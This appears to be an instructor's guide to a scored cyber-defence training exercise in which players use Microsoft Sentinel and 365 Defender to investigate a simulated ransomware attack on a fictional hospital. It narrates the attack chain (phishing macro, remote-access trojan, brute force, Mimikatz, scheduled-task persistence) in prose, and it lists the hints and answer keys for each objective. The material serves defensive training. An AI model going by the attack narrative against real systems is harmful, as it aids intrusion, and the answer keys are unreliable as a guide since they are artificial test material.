Professional Documents
Culture Documents
Security Immersion - Into The Breach - Instructors Guide - Aug 2022
Security Immersion - Into The Breach - Instructors Guide - Aug 2022
©2022 Circadence Corporation. All rights reserved. Circadence, the Circadence logo, Project Ares, and the Project Ares logo
are trademarks or registered trademarks of Circadence in the U.S and in other countries.
All other trademarks or registered trademarks belong to their respective owners.
Table of Contents
Contents
Target Audience ...................................................................................................................................................4
Course Description ...............................................................................................................................................4
Prerequisites ........................................................................................................................................................4
Conventions Used in this Guide ...........................................................................................................................4
Version Control ....................................................................................................................................................4
Player Access ........................................................................................................................................................5
System Requirements ......................................................................................................................................5
Connectivity Test..............................................................................................................................................6
Account Activation ...........................................................................................................................................6
Instructor Login Process.......................................................................................................................................6
Navigating Instructor Tools ..................................................................................................................................8
Navigating the Instructor Dashboard.................................................................................................................13
Navigation Basics: How to Run Into The Breach ................................................................................................14
Into The Breach Scenario Narrative ...................................................................................................................18
Threat Actor’s Attack Path Summary .............................................................................................................18
Victim Scenario ..............................................................................................................................................19
UVM Health (Victim) Network Architecture ..................................................................................................20
Solving Mission Tasks .........................................................................................................................................21
Using Hints to Solve Mission Tasks ....................................................................................................................22
Using the VNC console .......................................................................................................................................23
Running Microsoft Sentinel ...............................................................................................................................24
Running Microsoft 365 Defender ......................................................................................................................29
Microsoft 365 Defender and Sentinel Documentation .....................................................................................31
Answering Questions via the Analyst Portal ......................................................................................................32
Into The Breach - Objectives and Solutions .......................................................................................................34
Objective 01: Can you take a Hint? ................................................................................................................34
Objective 02: Piling Bricks ..............................................................................................................................35
Objective 03: Malware Everywhere! .............................................................................................................37
Objective 04: Repeat Offender ......................................................................................................................38
Objective 05: The Source of Evil ....................................................................................................................40
Course Description
The Microsoft Into The Breach (ITB) will empower students with in-depth knowledge of defending
against a cyberattack using Microsoft Defender and Sentinel Cyber defense tools.
Prerequisites
Players should be familiar with Microsoft Defender and Sentinel Cyber defense tools.
Version Control
Version control for this document can be found in Appendix A here.
System Requirements
While we cannot control the type of endpoint participants use, we can reduce the risk by ensuring
that their systems meet the minimum requirements to ensure a great Project Ares experience.
If a player communicates issues from the start of the event (for example, everything is
running very slowly), review the minimum system requirements with them.
Players can test their network connections by running the test located here:
https://projectares.academy/test-your-connection
Account Activation
Players should already have activated their accounts prior to the event, however, for last minute
additions there is a resource to help get players activated and onto the platform.
Here is a brief video on how to logon to Project Ares: Logging on to Project Ares.
Pro Tip: Have players bookmark our homepage: Welcome to Project Ares
After successfully logging on, you will be taken to the Home page. As an instructor you have access
to a Dashboard for tracking student progress covered here. Click on .
Your account has been created with an Instructor profile, allowing you to enter as an Instructor.
Click
This opens the Dashboard page where you can view overall player progress on this mission.
There are two options for launching the Microsoft Security Immersion Workshop - Into the Breach:
On the mission dashboard shown below, No Data Available appears the first time this mission runs.
The History tab displays information about dates, scores, and mission statistics.
On the left side, adjacent to the mission coin, is a brief description of the mission where players can
choose a difficulty level, and then, click on to begin the mission.
After the video, the Mission control panel appears as shown below. Players click on the gold
button to review the mission’s orders.
Each tab provides the player with different informational aspects about the
mission. Clicking each tab sequentially allows the player to review each topic where they learn
important information related to the mission. On reading the final tab, clicking on
Continue returns the player back to Mission Control.
The mission button will initially ignite in red as the Azure cloud environment initializes
the Virtual Machines (VMs) required to run the mission scenarios.
1. Attacker sends a phishing email to several employees at UBM Health claiming that the connection
to their NMIS is faulty and requesting that they open the attached file for instructions on fixing it.
2. One employee actually opens the attached Word document which prompts the execution of an
embedded malicious macro. The macro execution connects to the attacker’s C2 server to download
the Remote Access Trojan (RAT). When the RAT is executed, the attacker receives a callback shell
from the initial access endpoint: REHAB-6.
4. Attacker identifies a network share containing patient records, then copies the contents of the share
to the local system before archiving and exfiltrating.
7. Attacker stages Netcat executable, then sends internal spearphishing email from compromised
account (JROADER) to SBEAVERS. This email included the renamed Netcat executable as an
attachment. This email is quarantined by Defender.
8. When the internal spearphishing attempt fails, the attacker performs a port scan of the network.
9. Attacker then targets SBEAVERS account for brute force against FLOOR-5-ADM (172.16.20.100)
using port 3389 (RDP).
10. With a successful RDP brute force, attacker uses the credentials to perform WMI commands on
FLOOR-5-ADM, including the creation of a scheduled task to get a callback and establish
persistence.
11. With RDP access, attacker uses PsExec and Mimikatz to dump credential hashes.
12. With the hash for UVMADMIN, attacker uses WMIexec to create a scheduled task to get a callback
and establish persistence on the DC.
13. Once on the Domain Controller (DC), attacker performs Active Directory (AD) recon using
Bloodhound.
14. Attacker attempts to stage ransomware on the DC, but the files are quarantined by Defender.
15. Attacker pivots to attacking from the NMIS endpoint, using that trusted connection to perform
remote execution in order to download and execute the ransomware on every accessible endpoint.
The Into The Breach Players are being requested to assist with the Incident Response investigation
of an attack on the UVM Health Network.
You have arrived at the hospital and begin working with the local IT support office. Their network
security was provided by a managed security service MSSP and still hosts an NMIS with a trusted
connection into the hospital.
Using the Field Operations screen below as a reference, note the second mission objective “Piling
Bricks: On what endpoint did the ransomware execute successfully?”
The player can launch VNC Access to open a new browser in order to access the Microsoft Sentinel
and Defender tools. If unable to answer a question you can seek help using by clicking on the
question mark which opens the Hints window shown below.
There are four hints, with the final hint providing the answer. If a player can answer the Objective
challenge without hints, they will gain an advantage by receiving maximum points. When hints are
used, the maximum points decrease. This gives players who determine the correct responses
without using hints an advantage and they will have a greater chance of moving up the
leaderboard. See the next section for more details. See the next section for more details on how
scoring works.
Players are not penalized for using Hints in that points are not subtracted from their score for using
them, at the same time they will not be rewarded with the maximum points available. Because the
Leaderboard is based on points, the use of Hints will negatively affect a player’s position on the
board.
They click on the adjacent to the task objective. This will open first page of
the hints window. The player then reviews the hint and is free to switch back to the console
window and attempt to solve the task objective.
If the player wishes to see a second hint, they click on the right arrow, revealing a second
hint. Likewise, they can continue through the hints until in the final hint, the answer is
revealed.
Clicking on will open a new browser window providing the player a remote console
where all of the tasks and exercises will take place for this mission.
Notice the icon. Clicking on that icon will open up a browser with three tabs: One for
To launch Sentinel:
1. From the Field Operations screen, click on . This will open a new browser for
2. From the console window double-click on the Short-cut and in the browser
that opens, click on the second tab to access Sentinel. (Note: the order of the tabs may be
slightly different in your session).
3. Logon to Sentinel using the credentials provided in the credentials file, found on the console
home page.
5. In the search Microsoft Azure search bar type and select from
the results window.
8. The incidents page is now open for use in solving Objectives. In many cases, you will need to
proceed to Defender to solve the Learning Objective. On the incidents page, click on an
incident where the Product name is .
Remember to adjust the timeframe in both Defender and Sentinel if you do not get the
results you are expecting. Below is a screenshot of how to adjust the timeframe in Sentinel.
First click on and then adjust the timeline; 14 days should work for most
objectives.
1. From the Field Operations screen, click on VNC Access. This will open a new browser for
access to the console.
2. From the console window double-click on the Short-cut on the left of the
screen. This will open a browser with three tabs. Select the Defender tab
3. Logon to Defender using the credentials provided in the credentials file, found on the
console home page.
Video Click here to view the 365 Defender logon walkthrough video.
For convenience, these Microsoft Sentinel and Defender documents can be found on the web here:
Players will find the complete set of documents on the VNC console desktop by clicking on the
shortcut:
This opens the window where players can enter their answers.
Hint 1:
The first hint provides a small amount of information, just to get you started if you
weren't really sure where to start. You may view this hint without penalty. You'll still
get 100 points once you complete the objective.
Hint 2:
The second hint will expand upon the first. It will get you closer to the answer,
perhaps directing you to the specific portal where the indicator can be found. It will
usually provide some leading information on what to do (or not do) next. Viewing this
hint will cost you 25 points. Your score for completing the objective at this point
would be 75 points.
Hint 3:
The third hint will get you even closer to the answer. This hint will typically point you
toward the section within the portal, and might include some guidance for a query or
filter if appropriate. Viewing this hint will cost you another 25 points. You will receive
50 points for this objective once you complete it.
The fourth, and last hint, will walk you through how to get the answer. We don't want
you completely stuck on a question! Viewing this hint will cost you another 25 points.
You will receive 25 points for this objective once you complete it.
Done
For this Learning Objective, the student is expected to access Microsoft 365 Defender through the
shortcut on the VNC desktop and determine which endpoints Defender terminated or prevented
the execution of ransomware.
A combination of knowledge, research and the in-game hints will eventually lead the Player to the
correct answer.
Here are the in-game Hints provided to solve this Learning objective:
Hint 1:
For additional information about the tools and features that might be helpful,
reference the "Investigate incidents with Microsoft Sentinel" link in the
Documentation folder on your Analyst desktop.
Hint 2:
Microsoft Sentinel's log aggregation and correlation can help us quickly identify high-
severity incidents. Access Microsoft Sentinel through the shortcut on the desktop or
navigate to https://portal.azure.com and select Microsoft Sentinel. Analyzing
anomalous account or system activity is one method to consider when searching for
potential ransomware on a network or endpoint devices. Depending on the size of the
network, this can be a daunting task to accomplish checking each endpoint device
one-by-one.
Hint 3:
Microsoft Sentinel can show us when incidents have been detected across our
security tools. In this scenario, it has aggregated data from Microsoft 365 Defender,
Microsoft Defender for Endpoint, and Microsoft Defender for Identity. Incidents and
alerts from Microsoft 365 Defender and Microsoft Defender for Endpoint will contain
the necessary evidence to help us find which endpoints ransomware executed on
successfully. With these tools, indications of a successful payload deployment will be
easily identifiable by locating suspicious incidents in the portal.
In Microsoft Sentinel, navigate to the Incidents tab under Threat management. Look
for a high severity alert from Microsoft 365 Defender related to privilege escalation
and ransomware*. Select that alert, then choose View full details. Scroll through the
Timeline tab reviewing the alerts. A few alerts will contain the answer you're looking
for, for example the 'Sodinokibi ransomware was detected’ alerts. From the incident
or Alert pages, you can also select Investigate in Microsoft 365 Defender or click the
Alert link to view the source data in the defender portal.
*Note: The name of the alert may change over time due to how M365D analytics works. For example. the alert
may refer to “privilege escalation and ransomware" or "'initial access and exfiltration", however, the “Multi-stage
incident involving” part of the alert appears to be consistent.
Now that we have some idea of where the ransomware successfully deployed and
which endpoint devices prevented infection, we can drill down into the specific
incidents where the infections occurred. Ransomware leaves a trail of activity behind
that can provide a detailed account of the initial execution and potentially where it
originated from.
For additional information about the tools and features that might be helpful,
reference the "Investigate incidents in Microsoft 365 Defender" link in the
Documentation folder on your Analyst desktop.
Microsoft 365 Defender is a great tool to find the answer to this question. Access
Microsoft 365 Defender through the shortcut on the desktop or navigate to
https://security.microsoft.com. Drilling down on a specific incident and
understanding how the ransomware was executed on the endpoint provides
extensive details about the ransomware including, but not limited to, the processes
that were started or stopped, commands executed during installation of the
ransomware, and the filename of the shared library that is the actual ransomware.
Microsoft 365 Defender portal is the primary location to determine the behavior of
the ransomware from installation through execution. Just viewing the top level
incident may not be enough, and you should investigate the incident in more detail
using the built-in features of the portal.
In Microsoft 365 Defender, navigate to the Incidents tab under Incidents & Alerts.
Look for the incident concerning privilege escalation and ransomware*. Open that
incident, then view the list of related alerts. A few alerts will contain the answer
you're looking for, for example the 'Sodinokibi ransomware was detected' alert. Open
that alert, then look through the Alert Story for a reference to a shared library.
*Note: The name of the alert may change over time due to how M365D analytics works. For example. the alert
may refer to “privilege escalation and ransomware" or "'initial access and exfiltration", however, the “Multi-stage
incident involving” part of the alert appears to be consistent.
mpsvc.dll
When they can, attackers will use a single mechanism to deploy malware across
many assets. In this scenario, you've seen that the attacker used PowerShell to
download the ransomware on an impacted device. For additional information about
the tools and features that might be helpful, reference the "Hunt for threats with
Microsoft Sentinel" link in the Documentation folder on your Analyst desktop.
At this point, using Microsoft Sentinel will greatly increase your chances of finding
specific pieces of information that may require specialized queries. Not all hope is
lost, as you can use pre-built queries to hunt for Powershell downloads under the
Threat Management.
In Microsoft Sentinel, select Hunting from under the Threat management category in
the left-hand menu. Look for the pre-built query about downloads via PowerShell,
using the search bar if needed. Before you select the query, set the appropriate time
range based on your knowledge of the attack. After you have set the time range,
select that query and click the View Results button. Review the results to see how
many assets the ransomware was downloaded to using PowerShell.
If you'd prefer not to count the lines, you could add the following logic to the end of
the query in order to get a succinct list of results related to the download of the DLL
file:
The Source of Evil - From what host did the attacker use remote commands to download and
execute the ransomware throughout the environment?
Attackers will often find a way into a network on an endpoint device or other host
that has little or no protection. This is usually a launching point to more critical
network devices or infrastructure that will provide the attacker with more control
over the larger network.
For additional information about the tools and features that might be helpful,
reference the "Investigate incidents in Microsoft 365 Defender" link in the
Documentation folder on your Analyst desktop.
Microsoft 365 Defender is a great tool to find the answer to this question. Access
Microsoft 365 Defender through the shortcut on the desktop or navigate to
https://security.microsoft.com
If using Microsoft Defender and looking at high level incidents that involve privilege
escalation, there are alerts that indicate suspicious usage of Windows Management
Instrumentation (WMI) that may lead to discovery of which device the attacker used
to execute the ransomware on the environment.
First, we need to identify which IP address the remote commands to download and
execute the ransomware came from. In Microsoft 365 Defender, navigate to the
Incidents tab under Incidents & Alerts. Look for the incident concerning privilege
escalation and ransomware*. Click on that incident to open the Incident Details page,
and click on the alerts tab to view the list of related alerts. Look for an alert about
“suspicious WMI process creation.” Scroll through the Alert Story to find an event
where cmd.exe was invoked remotely. Expanding that event will provide the source
Now that we’ve identified 192.168.0.100 as the source of the remote execution, we
can review the network map to determine which host is associated with that IP
address.
*Note: The name of the alert may change over time due to how M365D analytics works. For example. the alert
may refer to “privilege escalation and ransomware" or "'initial access and exfiltration", however, the “Multi-stage
incident involving” part of the alert appears to be consistent.
NMIS
Sniffing Around - What Active Directory enumeration tool did the attacker use to gather information
on the Domain Controller?
Having information about how the ransomware was executed in the environment, we
can now expand our scope to understand what led up to that moment. Understanding
the ransomware can lead us into understanding what the attacker was doing as they
moved through the environment.
For additional information about the tools and features that might be helpful,
reference the "Investigate devices in the Microsoft Defender for Endpoint Devices
list" link in the Documentation folder on your Analyst desktop.
Microsoft 365 Defender is a great tool to find the answer to this question. Access
Microsoft 365 Defender through the shortcut on the desktop or navigate to
https://security.microsoft.com.
When attackers achieve initial access to an environment and as they move laterally
through it, they often perform discovery and enumeration tasks to gather as much
information as they can. Some alerts provide a clear indication about the activity that
the attacker was performing to acquire this information.
By using Microsoft 365 Defender and focusing on alerts on the domain controller you
should find clear indications of tool usage and the activity that the attacker
performed.
In Microsoft 365 Defender, navigate to the Incidents tab under Incidents & Alerts.
Look for the incident concerning privilege escalation and ransomware*. Click on that
incident to open Incident Details page, and click on the devices tab to view the list of
related devices. Select the Domain Controller (dc01) from this list. Choose the Alerts
tab to view the alerts detected on this particular endpoint. Look for an alert title
containing the name of a well-known Active Directory enumeration tool, which will
reference post-exploitation.
Bloodhound
Sneaking Through the Back - What administrative tool is used to establish persistence on the
Domain Controller? Provide the executable name.
Another common attacker technique for laying low is using common system tools to
perform aspects of their attack. This can help them stay hidden in the environment,
as security tools may be less likely to detect suspicious behavior from benign
applications.
For additional information about the tools and features that might be helpful,
reference the "Investigate devices in the Microsoft Defender for Endpoint Devices
list" link in the Documentation folder on your Analyst desktop.
Microsoft 365 Defender is a great tool to find the answer to this question. Access
Microsoft 365 Defender through the shortcut on the desktop or navigate to
https://security.microsoft.com.
Although most system tools provide a benefit to system efficiency and health, there
may be suspicious activities that are detected by Microsoft 365 Defender. Further
analysis of this type of activity is recommended to provide more insight into the how
the administrative tool was used to determine if it is legitimate use or actions taken
by an attacker.
Using the alerts in Microsoft 365 Defender for the specific endpoint in question will
provide enough information on how this administrative tool was used in this
objective.
In Microsoft 365 Defender, navigate to the Incidents tab under Incidents & Alerts.
Look for the incident concerning privilege escalation and ransomware*. Click on that
incident to open the Incident Details page, and click on the devices tab to view the
list of related devices. Select the Domain Controller (dc01) from this list. Choose the
Alerts tab to view the alerts detected on this particular endpoint. Look for an alert
title referencing the scheduling of tasks. Selecting this alert will show you the Alert
*Note: The name of the alert may change over time due to how M365D analytics works. For example. the alert
may refer to “privilege escalation and ransomware" or "'initial access and exfiltration", however, the “Multi-stage
incident involving” part of the alert appears to be consistent.
schtasks.exe
Just like choosing to use common system tools, choosing names that blend in can
also help attackers hide from security tools and analysts.
For additional information about the tools and features that might be helpful,
reference the "Investigate devices in the Microsoft Defender for Endpoint Devices
list" link in the Documentation folder on your Analyst desktop.
Microsoft 365 Defender is a great tool to find the answer to this question. Access
Microsoft 365 Defender through the shortcut on the desktop or navigate to
https://security.microsoft.com.
Further analysis of the suspicious activity discovered on the domain controller and
the system tool that was used to conduct this activity provides detailed knowledge of
how the attacker gained persistence on the target.
The alerts listed for the domain controller in Microsoft 365 Defender provide a wealth
of knowledge on how the attacker gained persistence to this endpoint. You must drill
down into alerts related to this activity to discover the name of the task used by the
attacker.
In Microsoft 365 Defender, navigate to the Incidents tab under Incidents & Alerts.
Look for the incident concerning privilege escalation and ransomware*. Click on that
incident to open the incident Details page, and click on the devices tab to view the
list of related devices. Select the Domain Controller (dc01) from this list. Choose the
Alerts tab to view the alerts detected on this particular endpoint. Look for an alert
title referencing the scheduling of tasks. Selecting this alert will show you the Alert
Story. Look for the events where the scheduled task is being created via a command.
The '/tr' switch designates the executable name, while the '/tn' switch sets the task
name.
By identifying the persistence mechanism we have learned that it may have been
used to connect back to the attacker's machine, where they would most likely have a
listener waiting.
For additional information about the tools and features that might be helpful,
reference the "Investigate devices in the Microsoft Defender for Endpoint Devices
list" link in the Documentation folder on your Analyst desktop.
Microsoft 365 Defender is a great tool to find the answer to this question. Access
Microsoft 365 Defender through the shortcut on the desktop or navigate to
https://security.microsoft.com. In order to blend in with normal traffic, the attacker is
likely to choose a destination port that would typically be seen as totally normal. This
traffic may not be easily discovered like more intrusive activities that typically
generate alerts. Understanding the time frame that the attack occurred will be
beneficial to other forms of analysis to discover activity that may appear to be normal
to the system.
In Microsoft 365 Defender, navigate to the Incidents tab under Incidents & Alerts.
Look for the incident concerning privilege escalation and ransomware*. Click on that
incident to open the Incident Details page, and click on the devices tab to view the
list of related devices. Select the Domain Controller (dc01) from this list. Choose the
Timeline tab to view the timeline of events detected by Defender, even ones that
aren't correlated with an alert or incident. Change the time frame to fit the attack
scope, and set a filter for Network events. To make finding the particular network
*Note: The name of the alert may change over time due to how M365D analytics works. For example. the alert
may refer to “privilege escalation and ransomware" or "'initial access and exfiltration", however, the “Multi-stage
incident involving” part of the alert appears to be consistent.
40.77.31.232:8443
Friend or Foe? What management protocol was used to perform remote execution against the
Domain Controller?
The practice of using system tools is often called 'living off the land' by people in
cybersecurity. The attacker can count themselves fortunate when they find system
tools that let them remotely access or interact with other endpoints in the
environment.
For additional information about the tools and features that might be helpful,
reference the "Investigate devices in the Microsoft Defender for Endpoint Devices
list" link in the Documentation folder on your Analyst desktop.
Microsoft 365 Defender is a great tool to find the answer to this question. Access
Microsoft 365 Defender through the shortcut on the desktop or navigate to
https://security.microsoft.com.
In Microsoft 365 Defender, navigate to the Incidents tab under Incidents & Alerts.
Look for the incident concerning privilege escalation and ransomware*. Click on that
incident to open the Incident Details page, and click on the devices tab to view the
list of related devices. Select the Domain Controller (dc)01 from the list. Choose the
Alerts tab to view the alerts detected on this particular endpoint. Look for an alert
title concerning suspicious process creation which references a common Windows
management protocol.
Same Task, Different Box - On what other endpoint did the attacker create the same scheduled task
using a different executable?
Like the rest of us humans, attackers are creatures of habit and benefit from
efficiency. As a result, they are just as prone to reusing tools and techniques as the
rest of us. In this scenario, the attacker used the same method for establishing
persistence on the middle endpoint they compromised as they did on the DC.
For additional information about the tools and features that might be helpful,
reference the "Proactively hunt for threats with advanced hunting" link in the
Documentation folder on your Analyst desktop.
Sometimes, Microsoft 365 Defender finds a behavior suspicious on one endpoint, but
not on another. This could be the result of many factors, including configurations or
auditing rules, but it can also be based on contextual data about the overarching
activities seen on each endpoint. Since Defender for Endpoint didn't alert on any
other suspicious scheduled tasks, we can leverage its Hunting capabilities to
broaden our search for this specific behavior.
Microsoft 365 Defender Advanced Hunting lets us use the Keyword Query Language
(KQL) to search data across our sources for results that match our requirements. For
our purposes, we can craft a query for all events containing the name of the
scheduled task we identified previously. If we knew the event ID for scheduled task
creation off the tops of our heads, we could use that as our filter also. Since KQL is
also used by Microsoft Sentinel, we could search either tool using the same query.
In Microsoft 365 Defender, navigate to Advanced Hunting under Hunting in the left-
hand menu. Add your query to the Query field, leveraging the Schema and Functions
tabs if needed for guidance. Adjust your timeframe as needed, then click Run query.
The query below will do the trick in this scenario.
DeviceEvents
floor-5-adm
The Sneakiest of Services - What is the filename of the executable used to establish persistence after
the first lateral movement?
For this scheduled task, the attacker used a different executable. Unlike on the DC,
where they executed a callback to a network listener on their end, this time they put
the listener on the internal endpoint but disguised it as a common service executable.
This is another clever way attackers' try to disguise their actions.
For additional information about the tools and features that might be helpful,
reference the "Investigate devices in the Microsoft Defender for Endpoint Devices
list" link in the Documentation folder on your Analyst desktop.
Microsoft 365 Defender doesn't only enable you to view and analyze data related to
alerts and incidents, it also gathers event data from endpoints. This is great for
adding more context to understand what happened around overtly suspicious or
malicious activity. The Timeline tab for each onboarded endpoint lets you filter by
timeframe and event type, as well as providing a Search feature to make narrowing
down the results even easier.
As is often the case, using multiple ways of filtering at once can help us find the
answers we need more efficiently. Rather than applying one filter and scrolling
through the thousands of events accumulated in the Timeline view, consider how
multiple filters could help narrow down your results. For this step, searching for a
known string in combination with filtering by event type and timeframe could be
useful.
In Microsoft 365 Defender, navigate to the Devices list under the Assets category,
then select floor-5-adm from the list. Choose the Timeline tab to view the timeline of
events detected by Defender, even ones that aren't correlated with an alert or
incident. Change the timeframe to fit the attack scope, and set a filter for Scheduled
Task events. To make finding the right event easier, add the name of the scheduled
task to the Search field: Network Controller Manager.
svchost.exe
Before attempting to move laterally again, the attacker sought to gather some very
important data. They had successfully gained access to a machine with 'adm' in the
hostname, so they may have been hoping to luck into more administrator credentials.
By gathering password hashes, they could attempt to crack them or try to achieve
authentication via pass-the-hash exploits.
For additional information about the tools and features that might be helpful,
reference the "Investigate devices in the Microsoft Defender for Endpoint Devices
list" link in the Documentation folder on your Analyst desktop.
Unlike using system tools that might not be detected by Microsoft Defender for
Endpoint, credential harvesting tools tend to raise flags. Not only was the behavior
seen and alerted on, Microsoft 365 Defender successfully correlated its connection
to the callback malware that allowed the attacker to establish access.
This time, Microsoft 365 Defender alerted on the behavior while referencing the
scripting language used to invoke the credential harvesting tool. PowerShell has only
increased in popularity over the years, both for system administrators and attackers.
Through the course of this attack, we see the attacker repeatedly rely on built-in
PowerShell capabilities, and also downloading and importing their own modules.
In Microsoft 365 Defender, navigate to the Devices List under the Assets category,
then select the floor-5-adm from the list. Choose the Alerts tab to view the alerts
detected on this particular endpoint. Look for an alert title referencing a credential
theft tool.
Mimikatz
How was the attacker even able to run a credential harvester? Many techniques used
by attackers to gather credentials are automatically detected and blocked by
Microsoft Defender for Endpoint. We can even see alerts about the tools used being
detected, so why weren't they stopped?
For additional information about the tools and features that might be helpful,
reference the "Investigate incidents with Microsoft Sentinel" link in the
Documentation folder on your Analyst desktop.
With the right connectors configured, Microsoft Sentinel gathers the data from
endpoint event logs. This gives us a view into events that might have been captured
by the local Windows Event platform even if it wasn't alerted on by Defender for
Endpoint. Based on past experience, the environment was already configured with
informational event alerts that relate to administrative activity. Because some
behavior was already configured to alert, we can see Incidents where our Analytics
rules were triggered.
The Incidents tab in Microsoft Sentinel is a great place to see incidents gathered
from across your security tools. In addition to the Microsoft Sentinel incidents, you'll
be able to see incidents from Microsoft 365 Defender, Defender for Endpoint, and
Defender for Identity.
In Microsoft Sentinel, navigate to the Incidents tab under Threat Management. Look
for an informational-level incident referencing a tactic that could be used by the
attacker for defense evasion as well as to eliminate roadblocks to their attack.
The following query could also be used in the Logs tab to manually find these results:
But how did the attacker even get access to this endpoint? That's the next question
we need to answer. It doesn't look like this was their initial access, so where did they
move laterally from? For that, we'll look for credential access alerts. For additional
information about the tools and features that might be helpful, reference the
"Investigate incidents with Microsoft Sentinel" link in the Documentation folder on
your Analyst desktop.
With the right connectors configured, Microsoft Sentinel gathers the data from
endpoint Security Event logs. This gives us a view into events that might have been
captured by the local Windows Event platform even if it wasn't alerted on by
Defender for Endpoint. Based on past experience, the environment was already
configured with security event alerts for known-bad activity, such as remote brute
force. Because some behavior was already configured to alert, we can see Incidents
where our Analytics rules were triggered.
The Incidents tab in Microsoft Sentinel is a great place to see incidents gathered
from across your security tools. In addition to the Microsoft Sentinel incidents, you'll
be able to see incidents from Microsoft 365 Defender, Defender for Endpoint, and
Defender for Identity.
In Microsoft Sentinel, navigate to the Incidents tab under Threat Management. Look
for an incident title indicating a tactic that could be used to achieve credential access
to enable lateral movement. In this case, you'll find an incident targeting a remote
access protocol.
Brute Force
From those alerts, we can drill into the logs to find where the brute force was coming
from. A brute force from outside the environment likely would have gotten blocked
by the firewall, so maybe it came from the initial access endpoint.
For additional information about the tools and features that might be helpful,
reference the "Investigate incidents with Microsoft Sentinel" link in the
Documentation folder on your Analyst desktop.
With the right connectors configured, Microsoft Sentinel gathers the data from
endpoint Security Event logs. This gives us a view into events that might have been
captured by the local Windows Event platform even if it wasn't alerted on by
Defender for Endpoint. Based on past experience, the environment was already
configured with security event alerts for known-bad activity, such as remote brute
force. Because some behavior was already configured to alert, we can see Incidents
where our Analytics rules were triggered.
Once you know what incident you want to drill into, you'll easily be able to pivot to
viewing the relevant alerts or events. A quick way to get to the network flow logs that
relate to the alert is by choosing Events from the Incident details pane, selecting a
single alert from the timeline, then clicking the Link to LA. This will automatically
generate a LogAnalytics query to get all the results related to that alert.
In Microsoft Sentinel, navigate to the Incidents tab under Threat Management. Look
for an incident title indicating a tactic that could be used to achieve credential
access, specifically the Remote Authentication Brute Force incident. Select that
incident then click view full details to see all the related information. Select a single
alert in the timeline, and select Link to LA to view the results in LogAnalytics. Look for
an IP address in the IPEntity or IpAddress column.
172.16.40.5
Internal phishing is one of the many lateral movement techniques that can be used by
attackers. For them, its benefits can include the opportunity to escalate their access
privileges while flying below the radar.
For additional information about the tools and features that might be helpful,
reference the "Investigate incidents with Microsoft Sentinel" link in the
Documentation folder on your Analyst desktop.
Microsoft 365 Defender is a great tool to find the answer to this question. Access
Microsoft 365 Defender through the shortcut on the desktop or navigate to
https://security.microsoft.com.
Email flow can be investigated using the Email & collaboration Explorer. By default,
the Explorer displays metrics about all email, with views on malware, phishing, and
campaigns also available. The available tabs also show the top malware families, top
targeted users, email origins, and campaigns. The View options may be useful as you
proceed with your investigation.
Applying filters to the email logs is a great way to find what you're looking for more
easily. In Microsoft 365 Defender, the filter has many options to choose from.
Formulating an Advanced filter will let you filter by multiple types or values at once. A
couple types that may be useful to you are sender domain, sender, recipient, and
directionality.
In Microsoft 365 Defender, navigate to the Explorer under Email & collaboration. The
All email tab should be your default view. Select the Advanced filter button to create
a filter with multiple parameters.
- Directionality: Intra-org
Use the Query button to submit the query, then adjust your time frame if needed. Hit
Refresh after changing your time frame to see the list of results. Look at the sender
column to determine the source account of the email that doesn’t look like normal
enterprise email traffic.
*Notice: to get keep data current, the platform toggles between uvmhealth1 and uvmhealth2; if one does not
work, try the other.
jroader@uvmhealthX*.onmicrosoft.com
For additional information about the tools and features that might be helpful,
reference the "Email security with Threat Explorer in Microsoft Defender for Office
365" link in the Documentation folder on your Analyst desktop.
In this scenario, external phishing gave the attacker initial access via an endpoint that
was not protected by Defender for Endpoint. Microsoft 365 Defender is a great tool
to find the answer to this question. Access Microsoft 365 Defender through the
shortcut on the desktop or navigate to https://security.microsoft.com.
Email flow can be investigated using the Email & collaboration Explorer. By default,
the Explorer displays metrics about all email, with views on malware, phishing, and
campaigns also available. The available tabs also show the top malware families, top
targeted users, email origins, and campaigns. The View options may be useful as you
proceed with your investigation.
Applying filters to the email logs is a great way to find what you're looking for more
easily. In Microsoft 365 Defender, the filter has many options to choose from.
Formulating an Advanced filter will let you filter by multiple types or values at once. A
couple types that may be useful to you are sender domain, sender, recipient, and
directionality.
In Microsoft 365 Defender, navigate to the Explorer under Email & collaboration. The
All email tab should be your default view. Select the Advanced filter button to create
a filter with multiple parameters. Using the Add a condition button, add the following
filter types and values:
- Directionality: Inbound
Use the Query button to submit the query, then adjust your timeframe if needed. Hit
Refresh after changing your timeframe to see the list of results. Review the Sender
column in the list of results to identify the source address of the phishing email that
led to an account compromise.
*Note: to get keep data current, the platform toggles between uvmhealth1 and uvmhealth2; if one does not work
please try the other.
systems@maxdefense.com
For additional information about the tools and features that might be helpful,
reference the "Email security with Threat Explorer in Microsoft Defender for Office
365" link in the Documentation folder on your Analyst desktop.
Since the initially accessed endpoint did not have Defender for Endpoint Real-Time
Protection enabled, the email attachment was able to download callback malware
using a macro. Based on mail logs and alerts about malware prevented on protected
endpoints, you can identify the exact file that was attached to phishing emails sent to
the users.
Applying filters to the email logs is a great way to find what you're looking for more
easily. In Microsoft 365 Defender, the filter has many options to choose from.
Formulating an Advanced filter will let you filter by multiple types or values at once. A
couple types that may be useful to you are sender domain, sender, recipient, and
directionality. After finding the source email, you can drill into the details to discover
information about the attachment itself.
In Microsoft 365 Defender, navigate to the Explorer under Email & collaboration. The
All email tab should be your default view. Change the filter type to Sender and add
the known source address to the filter field. Adjust your timeframe if needed, then hit
Refresh to see the list of results. Click on a single email, then scroll to the bottom of
the informational pane to view the attachments.
nmis_connectivity.docx
Sometimes when investigating an incident, you stumble across alerts that are
completely unrelated to the path you're uncovering. These unrelated alerts are
important to take note of to ensure they are appropriately reviewed and prioritized
for remediation.
For additional information about the tools and features that might be helpful,
reference the "Investigate alerts in Microsoft 365 Defender" link in the
Documentation folder on your Analyst desktop.
Microsoft 365 Defender is a great tool to find the answer to this question. Access
Microsoft 365 Defender through the shortcut on the desktop or navigate to
https://security.microsoft.com
Most alerts in Microsoft Defender provide enough information to quickly identify that
unsupported devices or operating systems have alerted to suspicious activity such
as accessing web sites or IP addresses know for phishing and other malicious
activity.
In Microsoft 365 Defender, navigate to the Alerts list under the Incidents & alerts
category. Look for an informational-level alert that references a device attempting to
access a phishing site and an investigation state "Unsupported OS." Open that alert
to see on which device the detection took place.
bberg_android
A macro is an action or a set of actions that you can run as many times as you want.
When you create a macro, you are recording your mouse clicks and keystrokes.
When a macro is run, it performs each action. As a result, malicious macros can be
created that execute commands, such as the PowerShell command used in this
scenario to download the callback malware.
For additional information about the tools and features that might be helpful,
reference the "Investigate incidents in Microsoft 365 Defender" link in the
Documentation folder on your Analyst desktop.
Since we're seeking to find events related to the creation of files and execution of
